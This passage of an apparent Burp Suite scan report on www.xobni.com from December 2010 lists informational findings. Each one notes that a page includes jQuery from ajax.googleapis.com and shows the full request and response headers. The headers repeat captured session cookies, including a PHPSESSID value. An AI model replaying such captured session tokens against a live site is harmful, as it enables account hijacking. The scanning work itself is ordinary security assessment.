Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.15. http://www.xobni.com/csscache/1256842155/styles/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1256842155/styles/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/1256842155/styles/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.16. http://www.xobni.com/csscache/1265760498/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1265760498/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/1265760498/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.17. http://www.xobni.com/csscache/1265760498/styles/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1265760498/styles/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/1265760498/styles/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.18. http://www.xobni.com/csscache/1291147037/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1291147037/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/1291147037/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.19. http://www.xobni.com/csscache/1291147037/styles/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /csscache/1291147037/styles/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /csscache/1291147037/styles/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.20. http://www.xobni.com/developer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /developer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /developer/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/press/testimonials
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.6.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 14030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Developer Z
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.21. http://www.xobni.com/developer/gadget_hoovers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /developer/gadget_hoovers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /developer/gadget_hoovers HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13548

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Zone de d..velopp
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.22. http://www.xobni.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.23. http://www.xobni.com/download/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.24. http://www.xobni.com/download/12341

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/12341

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /download/12341 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.25. http://www.xobni.com/download/latest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/latest

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /download/latest HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.26. http://www.xobni.com/email-analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /email-analytics

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /email-analytics HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11220

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Analytics F
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.27. http://www.xobni.com/enterprise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/products
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.4.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 11417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.28. http://www.xobni.com/enterprise/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.29. http://www.xobni.com/enterprise/case_studies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/case_studies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/case_studies HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.30. http://www.xobni.com/enterprise/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.31. http://www.xobni.com/enterprise/mobile_professionals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/mobile_professionals

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/mobile_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Enterprise
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.32. http://www.xobni.com/enterprise/sales_professionals

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /enterprise/sales_professionals

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /enterprise/sales_professionals HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
